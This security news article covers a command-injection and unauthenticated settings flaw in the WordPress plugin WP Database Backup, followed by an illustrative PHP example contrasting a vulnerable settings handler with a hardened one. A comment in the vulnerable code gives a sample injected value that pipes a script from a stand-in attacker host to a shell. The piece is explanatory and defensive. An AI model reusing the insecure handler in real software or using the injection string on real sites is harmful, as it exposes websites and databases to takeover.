Researchers on Wordfence's Threat Intelligence team warned on Tuesday that the WordPress plugin WP Database Backup contains a critical vulnerability. The developer has since patched the flaw.
WP Database Backup is a WordPress plugin that allows users to create and restore database backups for their websites. It has been installed over 70,000 times.
“The vulnerability, which was irresponsibly disclosed to the public before attempting to notify the plugin’s developers, was reported as a plugin configuration change flaw,” researchers indicated. “A proof of concept (PoC) exploit was provided which allowed unauthenticated attackers to modify the destination email address for database backups, potentially putting sensitive information in their hands.”
The flaw was publicly disclosed on April 24, and the plugin’s developer was notified the same day. Version 5.2 of WP Database Backup, released on April 30, patches it. Anyone still running an older version of the plugin should update as quickly as possible.
The flaw stems from how the plugin handles its settings. In unpatched versions of WP Database Backup, an attacker can inject arbitrary operating system commands into those settings; the commands are executed when the plugin performs a database backup. Injected commands persist until they are manually removed, running again each time a backup is run.
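The bug class described above, as an added illustration that is not code from WP Database Backup or from Wordfence: a settings handler that accepts changes without checking who sent the request, and a backup routine that builds a shell command from the stored settings, followed by a hardened form of both. The hook, option and field names (`hypo_*`) are hypothetical; the WordPress functions used (`add_action`, `update_option`, `current_user_can`, `check_admin_referer`, `sanitize_email`, `is_email`) are real core APIs.

```php
<?php
/*
 * Added illustration, not the plugin's code. Option names, field names and
 * the 'hypo_' prefix are hypothetical; the WordPress API calls are real.
 */

/* --- Vulnerable pattern ---------------------------------------------- */

// admin_init fires for every wp-admin request and also for admin-ajax.php,
// which accepts requests from users who are not logged in. Nothing here
// checks the caller's capability or a nonce, so anyone can change settings.
function hypo_save_backup_settings_vulnerable() {
    if ( isset( $_POST['hypo_backup_settings'] ) ) {
        // Attacker-controlled values are stored verbatim and persist.
        update_option( 'hypo_backup_settings', $_POST['hypo_backup_settings'] );
    }
}
add_action( 'admin_init', 'hypo_save_backup_settings_vulnerable' );

// The scheduled backup later reads the settings back and builds a shell
// command from them. A stored 'mysqldump_path' such as
//   "x; curl http://attacker.example/p.sh | sh"
// runs on every backup until the option is cleaned up.
function hypo_run_backup_vulnerable() {
    $s   = get_option( 'hypo_backup_settings' );
    $cmd = $s['mysqldump_path'] . ' --user=' . DB_USER . ' ' . DB_NAME
         . ' > ' . $s['backup_dir'] . '/backup.sql';
    exec( $cmd );
}

/* --- Hardened pattern ------------------------------------------------ */

function hypo_save_backup_settings_hardened() {
    if ( ! isset( $_POST['hypo_backup_settings'] ) ) {
        return;
    }
    // 1. Authorisation: only administrators may change plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // 2. CSRF: the form must carry a nonce bound to this action.
    check_admin_referer( 'hypo_backup_settings_save' );

    // 3. Validation: keep only known keys, and only values that pass a strict check.
    $in  = (array) $_POST['hypo_backup_settings'];
    $out = array();

    // mysqldump path: absolute, no shell metacharacters, must exist and be executable.
    $path = isset( $in['mysqldump_path'] ) ? sanitize_text_field( wp_unslash( $in['mysqldump_path'] ) ) : '';
    if ( '' !== $path && preg_match( '#^/[A-Za-z0-9_./-]+$#', $path ) && is_executable( $path ) ) {
        $out['mysqldump_path'] = $path;
    }

    // Notification address (the field the PoC changed): must parse as an e-mail address.
    $email = isset( $in['notify_email'] ) ? sanitize_email( wp_unslash( $in['notify_email'] ) ) : '';
    if ( is_email( $email ) ) {
        $out['notify_email'] = $email;
    }

    update_option( 'hypo_backup_settings', $out );
}
add_action( 'admin_init', 'hypo_save_backup_settings_hardened' );

function hypo_run_backup_hardened() {
    $s    = get_option( 'hypo_backup_settings', array() );
    $path = isset( $s['mysqldump_path'] ) ? $s['mysqldump_path'] : '/usr/bin/mysqldump';
    // The backup location is fixed by the plugin, not taken from settings.
    $dest = WP_CONTENT_DIR . '/hypo-backups/backup.sql';
    // Every non-literal argument goes through escapeshellarg().
    $cmd = escapeshellarg( $path )
         . ' --user=' . escapeshellarg( DB_USER )
         . ' --password=' . escapeshellarg( DB_PASSWORD )
         . ' ' . escapeshellarg( DB_NAME )
         . ' > ' . escapeshellarg( $dest );
    exec( $cmd, $output, $status );
    return 0 === $status;
}
```

The three checks in the hardened save handler address three separate failures: the capability check stops unauthenticated and low-privilege callers, the nonce stops a logged-in administrator being tricked into submitting the form, and the allowlist validation means that even a value that does get stored cannot carry shell syntax into the backup command. Quoting with `escapeshellarg()` at the point of use is the last line of defence, not a substitute for the first three.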
WP Database Backup at WordPress repository